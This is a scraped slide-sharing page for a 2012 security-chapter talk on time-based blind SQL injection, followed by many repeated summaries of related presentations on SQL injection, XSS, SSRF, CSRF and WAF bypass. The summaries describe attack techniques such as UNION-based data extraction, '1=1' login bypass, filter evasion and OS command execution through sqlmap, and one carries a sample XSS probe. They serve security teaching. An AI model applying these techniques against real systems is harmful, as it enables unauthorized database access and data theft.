Time-Based Blind SQL Injection
•Download as PPTX, PDF•
0 likes•11,718 views
This presentation was given at the November 2012 chapter meeting of the Memphis ISSA. In the presentation, I discuss various methods of exploiting common SQL Injection vulnerabilities, as well as present a specialized technique known as Time-Based Blind SQL Injection. Related to the latter, I give a scenario in which other common forms of SQL Injection would fail to produce results for a penetration tester or attacker, and show how one may overcome this situation by using the specialized technique. The scenario given, along with the sample code, is NOT a contrived example, but instead is closely based on a real-world application that I encountered as part of an assessment. A live demonstration of the common forms of SQL Injection was also given which utilized the OWASP Broken Web Apps VM, DVWA, Burp Proxy and SQL Power Injector. To demo a real-world time-based blind injection, I created and locally hosted a new application which closely mimicked the real-world application mentioned above.
Report
Share
Report
Share
Recommended
Sql injection - security testing
SQL injection is a type of attack where malicious SQL code is injected into an application's database query, potentially exposing or modifying private data. Attackers can bypass logins, access secret data, modify website contents, or shut down databases. SQL injection occurs when user input is not sanitized before being used in SQL queries. Attackers first find vulnerable websites, then check for errors to determine the number of columns. They use "union select" statements to discover which columns are responsive to queries, allowing them to extract data like user credentials or database contents. Developers should sanitize all user inputs to prevent SQL injection attacks.
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
Frans Rosén has reported hundreds of security issues using his big white hat since 2012. He have recieved the biggest bounty ever paid on HackerOne, and is one of the highest ranked bug bounty researchers of all time. He's been bug bounty hunting with an iPhone in Thailand, in a penthouse suite in Las Vegas and without even being present using automation. He'll share his stories about how to act when a company's CISO is screaming "SH******T F*CK" in a phone call 02:30 a Friday night, what to do when companies are sending him money without any reason and why Doctors without Borders are trying to hunt him down.
SQL Injection and Clickjacking Attack in Web security
SQL Injection and clickjacking attack - web security
information security, attacks, preventions, approaches
Building Advanced XSS Vectors
XSS is much more than just <script>alert(1)</script>. Thousands of unique vectors can be built and more complex payloads to evade filters and WAFs. In these slides, cool techniques to bypass them are described, from HTML to javascript. See also http://brutelogic.com.br/blog
SQL Injection
SQL injection is a code injection technique that exploits vulnerabilities in database-driven web applications. It occurs when user input is not validated or sanitized for string literal escape characters that are part of SQL statements. This allows attackers to interfere with the queries and obtain unauthorized access to sensitive data or make changes to the database. The document then provides step-by-step instructions on how to scan for vulnerabilities, determine database details like name and tables, extract data like user credentials, bypass protections like magic quotes, and use tools to automate the process.
Sql injection
This document discusses SQL injection attacks and how to mitigate them. It begins by explaining how injection attacks work by tricking applications into executing unintended commands. It then provides examples of how SQL injection can be used to conduct unauthorized access and data modification attacks. The document discusses techniques for finding and exploiting SQL injection vulnerabilities, including through the SELECT, INSERT, UPDATE and UNION commands. It also covers ways to mitigate injection attacks, such as using prepared statements with bound parameters instead of concatenating strings.
SQL Injection
SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).
A Brief Introduction in SQL Injection
This document discusses SQL injection, including what it is, how it works, and how to perform SQL injection attacks to extract information from a database and alter data. It provides examples of SQL queries that can be used to find the number of columns in a table, determine table and column names, and extract or alter data. The document notes that proper input validation and use of prepared statements are needed to prevent SQL injection attacks, and that no single solution can fully prevent SQL injection.
Recommended
Sql injection - security testing
SQL injection is a type of attack where malicious SQL code is injected into an application's database query, potentially exposing or modifying private data. Attackers can bypass logins, access secret data, modify website contents, or shut down databases. SQL injection occurs when user input is not sanitized before being used in SQL queries. Attackers first find vulnerable websites, then check for errors to determine the number of columns. They use "union select" statements to discover which columns are responsive to queries, allowing them to extract data like user credentials or database contents. Developers should sanitize all user inputs to prevent SQL injection attacks.
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
Frans Rosén has reported hundreds of security issues using his big white hat since 2012. He have recieved the biggest bounty ever paid on HackerOne, and is one of the highest ranked bug bounty researchers of all time. He's been bug bounty hunting with an iPhone in Thailand, in a penthouse suite in Las Vegas and without even being present using automation. He'll share his stories about how to act when a company's CISO is screaming "SH******T F*CK" in a phone call 02:30 a Friday night, what to do when companies are sending him money without any reason and why Doctors without Borders are trying to hunt him down.
SQL Injection and Clickjacking Attack in Web security
SQL Injection and clickjacking attack - web security
information security, attacks, preventions, approaches
Building Advanced XSS Vectors
XSS is much more than just <script>alert(1)</script>. Thousands of unique vectors can be built and more complex payloads to evade filters and WAFs. In these slides, cool techniques to bypass them are described, from HTML to javascript. See also http://brutelogic.com.br/blog
SQL Injection
SQL injection is a code injection technique that exploits vulnerabilities in database-driven web applications. It occurs when user input is not validated or sanitized for string literal escape characters that are part of SQL statements. This allows attackers to interfere with the queries and obtain unauthorized access to sensitive data or make changes to the database. The document then provides step-by-step instructions on how to scan for vulnerabilities, determine database details like name and tables, extract data like user credentials, bypass protections like magic quotes, and use tools to automate the process.
Sql injection
This document discusses SQL injection attacks and how to mitigate them. It begins by explaining how injection attacks work by tricking applications into executing unintended commands. It then provides examples of how SQL injection can be used to conduct unauthorized access and data modification attacks. The document discusses techniques for finding and exploiting SQL injection vulnerabilities, including through the SELECT, INSERT, UPDATE and UNION commands. It also covers ways to mitigate injection attacks, such as using prepared statements with bound parameters instead of concatenating strings.
SQL Injection
SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).
A Brief Introduction in SQL Injection
This document discusses SQL injection, including what it is, how it works, and how to perform SQL injection attacks to extract information from a database and alter data. It provides examples of SQL queries that can be used to find the number of columns in a table, determine table and column names, and extract or alter data. The document notes that proper input validation and use of prepared statements are needed to prevent SQL injection attacks, and that no single solution can fully prevent SQL injection.
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed Webinar Slides:
Brief coverage of SQLi and XSS against Web Services to then talk about XXE and XEE attacks and mitigation. Heavily inspired on the "Practical Web Defense" (PWD) style of pwnage + fixing (https://www.elearnsecurity.com/PWD)
Full recording here:
NOTE: (~20 minute) XXE + XEE Demo Recording starts at minute 25
https://www.elearnsecurity.com/collateral/webinar/xxe-exposed/
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
Microsoft's web browsers, Internet Explorer and Edge, have a feature called 'XSS filter' built in which protects users from XSS attacks. In order to deny XSS attacks, XSS filter looks into the request for a string resembling an XSS attack, compares it with the page and finds the appearance of it, and rewrites parts of the string if it appears in the page. This rewriting process of the string - is this done safely? The answer is no. This time, I have found a way to exploit XSS filter not to protect a web page, but to create an XSS vulnerability on a web page that is completely sane and free of XSS vulnerability. In this talk, I will describe technical details about possibilities of XSS attacks exploiting XSS filter and propose what website administrators should do to face this XSS filter nightmare.
Sql injection with sqlmap
This document discusses SQL injection and the sqlmap tool. It provides an overview of SQL injection, describes how sqlmap can be used to find and exploit SQL injection vulnerabilities, and demonstrates how it can be used to enumerate databases and files systems, and in some cases obtain remote access. It also discusses mitigation techniques like input sanitization and using prepared statements.
Sqlmap
A basic tutorial on using sqlmap on Kali Linux for sql injection.
The main focus being on comparison between manual and automated sql injection.
Some important parameters discussed and steps to be taken to discover vulnerabilities
By rushikesh kulkarni, president of Anonymous Club of BMSCE
Deep understanding on Cross-Site Scripting and SQL Injection
This presentation will provide you the deep knowledge of the Cross-Site Scripting and SQL Injection with the remediation and prevention measures.
SSRF For Bug Bounties
The document discusses Server Side Request Forgery (SSRF), including what it is, different types (blind and basic), ways to exploit it like bypassing filters and chaining vulnerabilities, tools that can be used for detection, and two case studies of SSRF vulnerabilities found in the wild. The first case involves using an SSRF to retrieve internal data and then storing malicious HTML in a generated PDF. The second case was an unauthenticated blind SSRF in a Jira OAuth authorization controller that was exploited through a malicious Host header.
Sql injection
SQL injection is a technique where malicious users can inject SQL commands into a web page input to alter SQL statements and compromise security. Attackers can exploit SQL injection flaws using techniques like the union operator to combine queries, boolean logic to verify conditions, error-based attacks to retrieve information, and time delays to conditionally delay responses. Proper sanitization of user input is needed to prevent stored procedure injection and protect websites from SQL injection attacks.
Sql injection
The document discusses SQL injection attacks and how they work. SQL injection occurs when user input is inserted directly into an SQL query string without proper validation or escaping. This allows attackers to alter the structure of the intended SQL query and potentially gain unauthorized access to sensitive data or make unauthorized changes to the database. The document provides examples of vulnerable queries and how attackers can exploit them to inject malicious SQL code. It also lists some common techniques used in SQL injection attacks and provides recommendations for preventing SQL injection vulnerabilities.
Owasp Top 10 A1: Injection
This document discusses injection vulnerabilities like SQL, XML, and command injection. It provides examples of how injection occurs by mixing commands and data, including accessing unauthorized data or escalating privileges. The speaker then discusses ways to prevent injection, such as validating all user input, using prepared statements, adopting secure coding practices, and implementing web application firewalls. The key message is that applications should never trust user input and adopt defense in depth techniques to prevent injection vulnerabilities.
Cross site scripting attacks and defenses
Cross-site scripting (XSS) is an injection attack where malicious scripts are injected into otherwise trusted sites. There are three main types of XSS attacks: reflected XSS occurs via URLs, stored XSS occurs when scripts are stored in a database and delivered to users, and DOM-based XSS modifies the DOM environment. XSS attacks can lead to issues like session hijacking, phishing, and port scanning. Developers can prevent XSS by validating and encoding untrusted data, and using HTTP-only and secure flags for cookies.
SQL injection prevention techniques
This document discusses SQL injection and techniques to prevent it. SQL injection occurs when malicious SQL statements are inserted into an entry field to exploit vulnerabilities in the underlying database. Attackers can use SQL injection to bypass login screens or retrieve sensitive data. To prevent SQL injection, developers should escape special characters in user input before submitting queries, use prepared statements with bound parameters, and validate and sanitize all input. Input escaping involves using database-specific escape functions like mysql_real_escape_string() to avoid unintended SQL commands. Proper input validation and escaping helps prevent SQL injection attacks.
Ppt on sql injection
This document discusses SQL injection, which is a security vulnerability that allows attackers to interfere with how a database operates. SQL injection occurs when user input is not sanitized and is used directly in SQL queries, allowing attackers to alter the structure and meaning of queries. The document provides an example of how an attacker could log in without a password by adding SQL code to the username field. It also lists some common SQL injection techniques like using comments, concatenation, and wildcards. Finally, it points to additional online resources for learning more about SQL injection and database security.
Sql Injection and XSS
Introduction to SQL injection and cross site scripting. Examples given using the Damn Vulnerable Web Application
Waf bypassing Techniques
General Waf detection and bypassing techniques. Main focus to demonstrate that how to take right approach to analyse the behaviour of web application firewall and then create test cases to bypass the same.
Frans Rosén Keynote at BSides Ahmedabad
The document describes a methodology for discovering vulnerabilities in a fictional application with a microservices architecture. It involves mapping out all APIs, endpoints, subdomains and requests to extract a comprehensive list. Parameters are then fuzzed on all combinations to find unintended behaviors like old or unused endpoints exposing more data than intended, or endpoints making internal calls that can be exploited through server-side request forgery or path traversal. Examples are given of similar vulnerabilities discovered in real applications, such as an unused JSON API leaking private user data, path traversal through internal API calls, and account hijacking through improper protection of authentication keys.
SQL Injections - A Powerpoint Presentation
A presentation going over various SQL injections and how to secure your website and server from them. Written by Vadim Gellerman.
Neat tricks to bypass CSRF-protection
Presentation from Zero Nights 2017 - https://2017.zeronights.ru/report/tryuki-dlya-obhoda-csrf-zashhity/.
Cross Site Scripting ( XSS)
Cross Site Scripting (XSS) is a vulnerability that allows malicious users to insert client-side code into web pages that is then executed by a user's browser. This code can steal cookies, access private information, perform actions on the user's behalf, and redirect them to malicious websites. XSS works by having the server display input containing malicious JavaScript from a request. There are different types of XSS attacks, including non-persistent, persistent, and DOM-based attacks. Prevention methods include validating, sanitizing, and escaping all user input on the server-side and client-side. Web vulnerability scanners like Burp Suite can help test for XSS and other vulnerabilities.
SQL Injections (Part 1)
This document provides an introduction to SQL injection basics. It defines SQL injection as executing a SQL query or statement by injecting it into a user input field. The document outlines why SQL injection is studied, provides a sample database structure, and describes generic SQL queries and operators like UNION and ORDER BY. It also categorizes different types of SQL injection and attacks. The remainder of the document previews upcoming topics on blind SQL injection, data extraction techniques, and prevention.
Sql injection attack
SQL injection is a code injection technique where malicious SQL statements are inserted into an entry field for execution, allowing a hacker to interfere with a database-driven application's interaction with backend databases. There are different types of SQL injections, including union-based, error-based, and blind SQL injections. Authentication can also be bypassed through SQL injection by making logical conditions like 1=1 or ""="" always true. The document provides examples of SQL injection payloads and demo websites to practice SQL injection techniques.
SQL Injection
This document discusses SQL injection and the sqlmap tool for automating the process of detecting and exploiting SQL injection flaws. Some key points:
- SQL is a programming language used to manage data in relational database management systems. SQL injection occurs when malicious SQL code is inserted into an entry field for execution, potentially enabling control of the entire database.
- Sqlmap automates the process of detecting and exploiting SQL injection vulnerabilities. It has capabilities like database fingerprinting, data extraction, accessing the underlying file system, and executing commands on the operating system via SQL injections.
- The tool can detect injectable parameters, generate automatic payloads to retrieve data, fingerprint the database management system, and provide an interactive SQL shell
Time-Based Blind SQL Injection using Heavy Queries
This presentation was delivered in Defcon 16 held in Las Vegas in 2008. It´s about Blind SQL Injection Techniques.
More Related Content
What's hot
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed Webinar Slides:
Brief coverage of SQLi and XSS against Web Services to then talk about XXE and XEE attacks and mitigation. Heavily inspired on the "Practical Web Defense" (PWD) style of pwnage + fixing (https://www.elearnsecurity.com/PWD)
Full recording here:
NOTE: (~20 minute) XXE + XEE Demo Recording starts at minute 25
https://www.elearnsecurity.com/collateral/webinar/xxe-exposed/
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
Microsoft's web browsers, Internet Explorer and Edge, have a feature called 'XSS filter' built in which protects users from XSS attacks. In order to deny XSS attacks, XSS filter looks into the request for a string resembling an XSS attack, compares it with the page and finds the appearance of it, and rewrites parts of the string if it appears in the page. This rewriting process of the string - is this done safely? The answer is no. This time, I have found a way to exploit XSS filter not to protect a web page, but to create an XSS vulnerability on a web page that is completely sane and free of XSS vulnerability. In this talk, I will describe technical details about possibilities of XSS attacks exploiting XSS filter and propose what website administrators should do to face this XSS filter nightmare.
Sql injection with sqlmap
This document discusses SQL injection and the sqlmap tool. It provides an overview of SQL injection, describes how sqlmap can be used to find and exploit SQL injection vulnerabilities, and demonstrates how it can be used to enumerate databases and files systems, and in some cases obtain remote access. It also discusses mitigation techniques like input sanitization and using prepared statements.
Sqlmap
A basic tutorial on using sqlmap on Kali Linux for sql injection.
The main focus being on comparison between manual and automated sql injection.
Some important parameters discussed and steps to be taken to discover vulnerabilities
By rushikesh kulkarni, president of Anonymous Club of BMSCE
Deep understanding on Cross-Site Scripting and SQL Injection
This presentation will provide you the deep knowledge of the Cross-Site Scripting and SQL Injection with the remediation and prevention measures.
SSRF For Bug Bounties
The document discusses Server Side Request Forgery (SSRF), including what it is, different types (blind and basic), ways to exploit it like bypassing filters and chaining vulnerabilities, tools that can be used for detection, and two case studies of SSRF vulnerabilities found in the wild. The first case involves using an SSRF to retrieve internal data and then storing malicious HTML in a generated PDF. The second case was an unauthenticated blind SSRF in a Jira OAuth authorization controller that was exploited through a malicious Host header.
Sql injection
SQL injection is a technique where malicious users can inject SQL commands into a web page input to alter SQL statements and compromise security. Attackers can exploit SQL injection flaws using techniques like the union operator to combine queries, boolean logic to verify conditions, error-based attacks to retrieve information, and time delays to conditionally delay responses. Proper sanitization of user input is needed to prevent stored procedure injection and protect websites from SQL injection attacks.
Sql injection
The document discusses SQL injection attacks and how they work. SQL injection occurs when user input is inserted directly into an SQL query string without proper validation or escaping. This allows attackers to alter the structure of the intended SQL query and potentially gain unauthorized access to sensitive data or make unauthorized changes to the database. The document provides examples of vulnerable queries and how attackers can exploit them to inject malicious SQL code. It also lists some common techniques used in SQL injection attacks and provides recommendations for preventing SQL injection vulnerabilities.
Owasp Top 10 A1: Injection
This document discusses injection vulnerabilities like SQL, XML, and command injection. It provides examples of how injection occurs by mixing commands and data, including accessing unauthorized data or escalating privileges. The speaker then discusses ways to prevent injection, such as validating all user input, using prepared statements, adopting secure coding practices, and implementing web application firewalls. The key message is that applications should never trust user input and adopt defense in depth techniques to prevent injection vulnerabilities.
Cross site scripting attacks and defenses
Cross-site scripting (XSS) is an injection attack where malicious scripts are injected into otherwise trusted sites. There are three main types of XSS attacks: reflected XSS occurs via URLs, stored XSS occurs when scripts are stored in a database and delivered to users, and DOM-based XSS modifies the DOM environment. XSS attacks can lead to issues like session hijacking, phishing, and port scanning. Developers can prevent XSS by validating and encoding untrusted data, and using HTTP-only and secure flags for cookies.
SQL injection prevention techniques
This document discusses SQL injection and techniques to prevent it. SQL injection occurs when malicious SQL statements are inserted into an entry field to exploit vulnerabilities in the underlying database. Attackers can use SQL injection to bypass login screens or retrieve sensitive data. To prevent SQL injection, developers should escape special characters in user input before submitting queries, use prepared statements with bound parameters, and validate and sanitize all input. Input escaping involves using database-specific escape functions like mysql_real_escape_string() to avoid unintended SQL commands. Proper input validation and escaping helps prevent SQL injection attacks.
Ppt on sql injection
This document discusses SQL injection, which is a security vulnerability that allows attackers to interfere with how a database operates. SQL injection occurs when user input is not sanitized and is used directly in SQL queries, allowing attackers to alter the structure and meaning of queries. The document provides an example of how an attacker could log in without a password by adding SQL code to the username field. It also lists some common SQL injection techniques like using comments, concatenation, and wildcards. Finally, it points to additional online resources for learning more about SQL injection and database security.
Sql Injection and XSS
Introduction to SQL injection and cross site scripting. Examples given using the Damn Vulnerable Web Application
Waf bypassing Techniques
General Waf detection and bypassing techniques. Main focus to demonstrate that how to take right approach to analyse the behaviour of web application firewall and then create test cases to bypass the same.
Frans Rosén Keynote at BSides Ahmedabad
The document describes a methodology for discovering vulnerabilities in a fictional application with a microservices architecture. It involves mapping out all APIs, endpoints, subdomains and requests to extract a comprehensive list. Parameters are then fuzzed on all combinations to find unintended behaviors like old or unused endpoints exposing more data than intended, or endpoints making internal calls that can be exploited through server-side request forgery or path traversal. Examples are given of similar vulnerabilities discovered in real applications, such as an unused JSON API leaking private user data, path traversal through internal API calls, and account hijacking through improper protection of authentication keys.
SQL Injections - A Powerpoint Presentation
A presentation going over various SQL injections and how to secure your website and server from them. Written by Vadim Gellerman.
Neat tricks to bypass CSRF-protection
Presentation from Zero Nights 2017 - https://2017.zeronights.ru/report/tryuki-dlya-obhoda-csrf-zashhity/.
Cross Site Scripting ( XSS)
Cross Site Scripting (XSS) is a vulnerability that allows malicious users to insert client-side code into web pages that is then executed by a user's browser. This code can steal cookies, access private information, perform actions on the user's behalf, and redirect them to malicious websites. XSS works by having the server display input containing malicious JavaScript from a request. There are different types of XSS attacks, including non-persistent, persistent, and DOM-based attacks. Prevention methods include validating, sanitizing, and escaping all user input on the server-side and client-side. Web vulnerability scanners like Burp Suite can help test for XSS and other vulnerabilities.
SQL Injections (Part 1)
This document provides an introduction to SQL injection basics. It defines SQL injection as executing a SQL query or statement by injecting it into a user input field. The document outlines why SQL injection is studied, provides a sample database structure, and describes generic SQL queries and operators like UNION and ORDER BY. It also categorizes different types of SQL injection and attacks. The remainder of the document previews upcoming topics on blind SQL injection, data extraction techniques, and prevention.
Sql injection attack
SQL injection is a code injection technique where malicious SQL statements are inserted into an entry field for execution, allowing a hacker to interfere with a database-driven application's interaction with backend databases. There are different types of SQL injections, including union-based, error-based, and blind SQL injections. Authentication can also be bypassed through SQL injection by making logical conditions like 1=1 or ""="" always true. The document provides examples of SQL injection payloads and demo websites to practice SQL injection techniques.
What's hot (20)
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
Viewers also liked
SQL Injection
This document discusses SQL injection and the sqlmap tool for automating the process of detecting and exploiting SQL injection flaws. Some key points:
- SQL is a programming language used to manage data in relational database management systems. SQL injection occurs when malicious SQL code is inserted into an entry field for execution, potentially enabling control of the entire database.
- Sqlmap automates the process of detecting and exploiting SQL injection vulnerabilities. It has capabilities like database fingerprinting, data extraction, accessing the underlying file system, and executing commands on the operating system via SQL injections.
- The tool can detect injectable parameters, generate automatic payloads to retrieve data, fingerprint the database management system, and provide an interactive SQL shell
Time-Based Blind SQL Injection using Heavy Queries
This presentation was delivered in Defcon 16 held in Las Vegas in 2008. It´s about Blind SQL Injection Techniques.
Types of sql injection attacks
The document discusses different types of SQL injection attacks, including tautologies, illegal/logically incorrect queries, union queries, piggybacked queries, and stored procedures. Tautologies aim to bypass authentication by making conditional statements always true. Illegal queries gather database information by causing syntax or type errors. Union queries extract data by combining results from multiple tables. Piggybacked queries maliciously execute additional queries by abusing query delimiters. Stored procedures can be used to escalate privileges or execute remote commands if vulnerabilities exist. Examples are provided for each type of attack along with potential solutions.
Time-Based Blind SQL Injection Using Heavy Queries
White paper about how to exploit SQL Injection vulnerabilities with Time-Based Blind SQL Injection using Heavy Queries
SQL injection: Not Only AND 1=1 (updated)
The presentation has a quick preamble on SQL injection definition, sqlmap and its key features.
I will then illustrate into details common and uncommon problems and respective solutions with examples that a penetration tester faces when he wants to take advantage of any kind of web application SQL injection flaw on real world web applications, for instance SQL injection in ORDER BY and LIMIT clauses, single entry UNION query SQL injection, specific web application technologies IDS bypasses and more.
These slides have been presented at the 2nd Digital Security Forum in Lisbon on June 27, 2009.
Updated version of http://www.slideshare.net/inquis/sql-injection-not-only-and-11.
Sql Injection Myths and Fallacies
The most massive crime of identity theft in history was perpetrated in 2007 by exploiting an SQL Injection vulnerability. This issue is one of the most common and most serious threats to web application security. In this presentation, you'll see some common myths busted and you'll get a better understanding of defending against SQL injection.
ArchitectureDesignPatternsStoryV3
The document discusses various architectural design patterns for building a hotel booking website. It describes common issues that can occur like multiple requests to databases from single homepage requests, caching and connection issues. It then provides solutions like output caching, connection pooling, event-driven architectures using publish/subscribe, and zero-downtime deployments to address these types of problems and improve performance, reliability and user experience.
Microsoft SQL Azure - Building Applications Using SQL Azure Presentation
Building Applications Using SQL Azure provides an overview of using Microsoft's SQL Azure platform as a service. It covers setting up a SQL Azure account, connecting applications, managing security, creating database objects, migrating schemas and data, performance considerations, and building a simple application connected to SQL Azure. The presentation aims to help database developers and architects understand how to build applications using the SQL Azure relational database service.
Advanced SQL injection to operating system full control (short version)
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
These slides have been presented at EUSecWest conference in London on May 28, 2009.
Full version presented at Black Hat Europe 2009 Conference, slides available here, http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-slides.
Union based sql injection by Urdu Tutorials Point
Union Based SQL Injection Tutorial by Urdu Tutorials Point.
This Presentation is Only for Educational Purpose :-).
facebook.com/UrduTutorialsPoint
Practical Approach towards SQLi ppt
This document discusses SQL injection, including what it is, different types, and how to exploit it. It begins with an introduction to SQL injection, describing error-based, time-based, and boolean-based SQLi. It then covers exploiting SQLi to compromise databases by uploading shells and using SQLmap. The remainder demonstrates SQLi techniques like union queries, extracting data, and bypassing filters. Tools, methodology, and resources for further learning are also mentioned.
SQLMAP Tool Usage - A Heads Up
SQLMAP is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
Normalisation student summary
The document discusses normalizing a database by eliminating redundancy and separating data into logical tables. The key points are:
1) Normalization breaks data into tables, each with a primary key, to minimize duplicated data and allow independent editing of tables.
2) Relationships between tables are created using common fields to link related data stored in separate tables.
3) Properly normalizing a database improves storage efficiency, data consistency, and maintenance by organizing data around single themes or concepts within individual tables.
SQL Injection Attacks cs586
What they are, steps you can take to prevent them, a brief overview.
3/13/2013 winter term 2013 at Portland State University for the Introduction to Databases class.
Presented by Stacy Watts and Tyler Fetters
Sql injection 幼幼班
透過簡單的攻擊範例,說明四種常見的 SQL Injection (Union Based Injection、Error Based Injection、Boolean Based Blind Injection、Time Based Blind Injection),並介紹一款常用的工具 sqlmap。
Sql injection attack
SQL is a language used to access and manipulate databases. It allows users to execute queries, retrieve, insert, update and delete data from databases. SQL injection occurs when malicious code is injected into an SQL query, which can compromise the security of a database. To prevent SQL injection, developers should validate all user input, escape special characters, limit database permissions, and configure databases to not display error information to users.
Les01 (retrieving data using the sql select statement)
This document provides an overview of using SQL SELECT statements and the iSQLPlus environment to retrieve and work with data. It covers the basic capabilities and syntax of SELECT statements including selecting all or specific columns, arithmetic expressions, aliases, and null values. It also describes interacting with the iSQLPlus environment, such as describing table structures, running SQL statements from scripts, and setting preferences. The key aspects of SQL statements and iSQLPlus commands are differentiated.
Blind SQL Injection - Optimization Techniques
This document discusses blind SQL injection techniques and optimizations. It begins with an overview of SQL injection and blind SQL injection. It then discusses available tools for exploiting blind SQL injection and various techniques for optimizing the process, such as narrowing the character set, using binary search to find characters more quickly, and treating numeric fields as strings. The document concludes by demonstrating a Python tool called bsqlishell.py that implements these optimization techniques in an interactive shell for efficiently exploiting blind SQL injection.
It all starts with the ' (SQL injection from attacker's point of view)
These are the slides from a talk "It all starts with the ' (SQL injection from attacker's point of view)" held at FSec 2011 conference (Croatia / Varazdin 22nd September 2011) by Miroslav Stampar
SQL Injection: complete walkthrough (not only) for PHP developers
Learn what is SQL injection, how to use prepared statements, how to escape and write secure stored procedures. Many PHP projects are covered - PDO, Propel, Doctrine, Zend Framework and MDB2. Multiple gotchas included.
Viewers also liked (20)
Time-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection Using Heavy Queries
Time-Based Blind SQL Injection Using Heavy Queries
Microsoft SQL Azure - Building Applications Using SQL Azure Presentation
Microsoft SQL Azure - Building Applications Using SQL Azure Presentation
Advanced SQL injection to operating system full control (short version)
Advanced SQL injection to operating system full control (short version)
Les01 (retrieving data using the sql select statement)
Les01 (retrieving data using the sql select statement)
It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developers
Similar to Time-Based Blind SQL Injection
Sql injection
SQL Injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements (also commonly referred to as a malicious payload) that control a web application's database server (also commonly referred to as a Relational Database Management System – RDBMS).
Protecting your data from SQL Injection attacks
Common ways to protect MS SQL server from SQL Injection using techniques found at OWASP http://owasp.org
Advanced Topics On Sql Injection Protection
The document discusses various methods for preventing SQL injection attacks, including input validation, using static query statements, and least privilege approaches. It provides detailed explanations and examples of how to properly implement input validation, including escaping special characters, validating numeric fields, and preventing second-order SQL injection. The document also cautions that approaches like parameterized statements and stored procedures do not automatically prevent SQL injection and can still be vulnerable if not implemented correctly.
ASP.NET Web Security
The document discusses various web security topics such as SQL injection, cross-site scripting (XSS), cross-site request forgery (CSRF), and parameter tampering. It provides examples of these vulnerabilities and methods to prevent them, including input validation, output encoding, anti-forgery tokens, and limiting exposed functionality. The document is intended as an educational guide on common web security issues and best practices.
SQL Injections - 2016 - Huntington Beach
This document discusses SQL injections and how to prevent them. It begins by defining SQL injections as a code injection technique used to attack data-driven applications by inserting malicious SQL statements. It then covers what SQL injections can do, like retrieve sensitive data, manipulate data, or retrieve system information. The document discusses how SQL injections work through different attack techniques. It provides strategies for preventing SQL injections like using parameterized queries and input validation. It also offers tips for identifying SQL injection attacks.
Full MSSQL Injection PWNage
This document provides an overview of SQL injection attacks and techniques for exploiting Microsoft SQL Server databases. It discusses the basics of SQL injection vulnerabilities and how they can be used to bypass authentication, evade audit logs, and search for vulnerable websites. The document then covers normal SQL injection attacks on MSSQL, including using HAVING/GROUP BY, CONVERT functions, and UNION queries. It also discusses blind SQL injection techniques, more advanced attacks using extended stored procedures, and SQL injection worm attacks. Countermeasures are suggested, and the document provides references and greetings.
Web security with Eng Ahmed Galal and Eng Ramy saeid
web security presentation for Cryptography course faculty of computers and information Cairo university
Sql injection
The document discusses SQL injection attacks. It explains that SQL injection works by tricking web applications into treating malicious user input as SQL code rather than data. This allows attackers to view sensitive data from the database or make changes by having the application execute unintended SQL commands. The key to preventing SQL injection is using prepared statements with bound parameters rather than concatenating user input into SQL queries. Other types of injection attacks on different interpreters are also discussed.
Sql injection
SQL injection is a common web application security vulnerability that allows attackers to control an application's database by tricking the application into sending unexpected SQL commands to the database. It works by submitting malicious SQL code as input, which gets executed by the database since the application concatenates user input directly into SQL queries. The key to preventing SQL injection is using prepared statements with bound parameters instead of building SQL queries through string concatenation. This separates the SQL statement from any user-supplied input that could contain malicious code.
Owasp Indy Q2 2012 Advanced SQLi
The document provides an overview of advanced SQL injection techniques, including blind SQL injection, data exfiltration, privilege escalation, command execution, uploading files, internal database server exploration, port scanning, and evasion techniques to bypass firewalls and web application firewalls. Specific examples are given for each technique using SQL Server, MySQL, Oracle, and other databases. Prevention methods are also discussed, such as input sanitization, prepared statements, stored procedures, principle of least privilege, and using a web application firewall.
Sql Injection V.2
SQL injection is a common web application vulnerability that allows attackers to inject malicious SQL statements into an application's database. It can allow data leakage, modification, denial of access, and complete host takeover. SQL injection occurs when user-supplied input is not properly sanitized before being used in SQL queries. Developers can prevent SQL injection by using prepared statements with parameterized queries, stored procedures, and properly escaping all user input. Web application firewalls and additional defenses like whitelist input validation can also help mitigate SQL injection risks.
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全.pptx
This document discusses building security for network applications using a defense-in-depth strategy on AWS. It describes defense-in-depth as using multiple independent layers of security to make attacks more difficult. The strategy involves building security into the application, on the secure AWS platform, and around the application. It provides examples of how to implement security controls in the application and how AWS WAF and managed rules provide security layers around the application.
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全
This document discusses building security for network applications using a defense-in-depth strategy on AWS. It recommends building security into applications by following best practices like the OWASP Top 10, and building security around applications using AWS security services like AWS WAF, which provides capabilities for detecting common attacks and allows custom rules through conditions and text transformations. It emphasizes that defense-in-depth involves multiple independent layers of security to increase the difficulty of successful attacks.
Web Security 101
